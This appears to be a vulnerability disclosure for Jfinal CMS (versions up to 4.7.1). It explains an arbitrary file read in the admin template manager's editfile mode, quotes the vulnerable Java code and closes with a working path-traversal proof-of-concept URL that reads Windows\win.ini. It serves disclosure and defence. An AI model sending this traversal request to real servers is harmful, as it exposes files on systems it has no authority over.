Jfinal cms Any file read in the background template management office

## Jfinal cms Any file read in the background template management office ### Introduction to Vulnerability Jfinal cms, using the simple and powerful JFinal as the web framework, the template engine is beetl, the database uses mysql, front-end bootstrap, flat ui and other frameworks. Support multi-site, oauth2 authentication, account registration, password encryption, comments and replies, message prompts, website traffic statistics, article comments and pageview statistics, response management, rights management, etc. Its background template management office does not filter the path passed by the user, resulting in arbitrary file read vulnerability. ### Vulnerability Impact - <= v4.7.1 ### Vulnerability Analysis The vulnerability trigger point is in `com/jflyfox/modules/filemanager/FileManagerController.java` ```java public void index() { HttpServletRequest request = getRequest(); try { request.setCharacterEncoding("UTF-8"); getResponse().setCharacterEncoding("UTF-8"); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } FileManager fm = new FileManager(getRequest()); JSONObject responseData = null; String mode = ""; String path = ""; boolean needPath = false; boolean putTextarea = false; if (!auth()) { fm.error(fm.lang("AUTHORIZATION_REQUIRED")); } else { String contextPath = request.getContextPath(); // 设置contextPath fm.setGetVar("contextPath", contextPath); mode = request.getParameter("mode"); path = request.getParameter("path"); if (path != null) { try { if (request.getMethod().equals("GET")) path = new String(path.getBytes("ISO8859-1"), "UTF-8"); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } needPath = fm.setGetVar("path", path); } if (request.getMethod().equals("GET")) { if (mode != null && mode != "") { if (mode.equals("getinfo")) { if (needPath) { responseData = fm.getInfo(); } ...... } else if (mode.equals("editfile")) { if (needPath) { responseData = fm.editFile(); ``` When the incoming mode is editfile, it will call `FileManager.editFile()` to process and follow `editFile()` ```java public JSONObject editFile() { JSONObject array = new JSONObject(); // 读取文件信息 try { String content = FileManagerUtils.readString(getRealFilePath()); content = FileManagerUtils.encodeContent(content); array.put("Path", this.get.get("path")); array.put("Content", content); array.put("Error", ""); array.put("Code", 0); } catch (JSONException e) { this.error("JSONObject error"); } catch (IOException e) { e.printStackTrace(); } return array; } ``` For the path passed by the user is not filtered, the readString function is directly called to read the file, thereby causing any file reading vulnerability. ### Vulnerability recurrence 1. Login to the background 2. Click on Template Management 3. Read the file ``` Http://localhost:8080/jfinal_cms/admin/filemanager?mode=editfile&path=..\..\..\..\..\..\..\..\Windows\win.ini&config=filemanager. Config.js&time=172 ```